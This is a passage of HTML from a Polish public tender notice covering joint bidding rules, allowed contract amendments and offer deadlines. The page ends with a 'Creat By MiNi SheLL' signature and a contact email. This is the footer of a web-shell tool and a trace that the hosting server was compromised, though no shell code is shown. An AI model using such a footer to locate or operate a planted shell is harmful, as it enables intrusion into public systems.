Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/> pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/> publicznego. Pełnomocnictwo winno być załączone do oferty.<br/> 2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/> ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/> budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/> 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, że usługi wykonają poszczególni wykonawcy, wg wzoru stanowiącego Załącznik nr 6 do SWZ.<br/> 4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania oraz spełnieniu warunków<br/> udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony przewidują możliwość dokonywania zmian na warunkach określonych w art. 454 i 455 ustawy Pzp. <br/>2.	Poza sytuacjami określonymi w Umowie, zmiany Umowy będą mogły nastąpić w następujących sytuacjach:<br/>a)	w zakresie warunków oraz terminu płatności, w szczególności w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, jak również w przypadku, gdy ze względu na interes Zamawiającego zmiana warunków oraz terminu płatności jest konieczna,<br/>b)	w zakresie sposobu wykonania przedmiotu umowy w szczególności, gdy zmiana sposobu realizacji wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia,<br/>c)	w zakresie zmian doprecyzowujących treść umowy, jeżeli potrzeba ich wprowadzenia wynika <br/>z rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów,<br/>d)	zaistnienia, po zawarciu Umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:<br/>•	charakterze niezależnym od Stron,<br/>•	którego Strony nie mogły przewidzieć przed zawarciem Umowy,<br/>•	którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności,<br/>Za siłę wyższą, warunkująca zmianę Umowy uważać się będzie w szczególności:<br/>epidemia, powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, które uniemożliwiają wykonanie umowy na warunkach w niej określonych.<br/>e)	nastąpiła zmiana przepisów prawa istotnych dla realizacji przedmiotu umowy;<br/>f)	zmiany, które będą konieczne do zagwarantowania zgodności umowy z wchodzącymi w życie po terminie składania ofert lub po zawarciu umowy przepisami prawa, w szczególności przepisami <br/>o podatku od towarów i usług w zakresie wynikającym z tych przepisów. W przypadku zmiany, <br/>o której mowa w niniejszej literze, wartość netto wynagrodzenia Wykonawcy nie ulegnie zmianie, a określona w aneksie do umowy wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów dotyczących podatku od towarów i usług.<br/>g)	zaistnienia omyłki pisarskiej lub rachunkowej<br/>h)	zmiany danych Wykonawcy bez zmiany samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),<br/>i)	gdy towar określony w ofercie Wykonawcy, a następnie w umowie, przestał być produkowany <br/>i jest niedostępny, co będzie potwierdzone stosownymi dokumentami. W takiej sytuacji Wykonawca może zaproponować inny towar, który musi spełniać warunki określone w opisie przedmiotu zamówienia za cenę nie wyższą, niż określoną w ofercie i umowie. Zmiana ta nie wymaga sporządzenia aneksu do umowy, a wyłącznie zgody Zamawiającego wyrażonej na piśmie,<br/><br/> CDN we wzorze umowy stanowiącym załącznik nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-10 16:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">4.1 Formularz oferty - Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-10 16:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com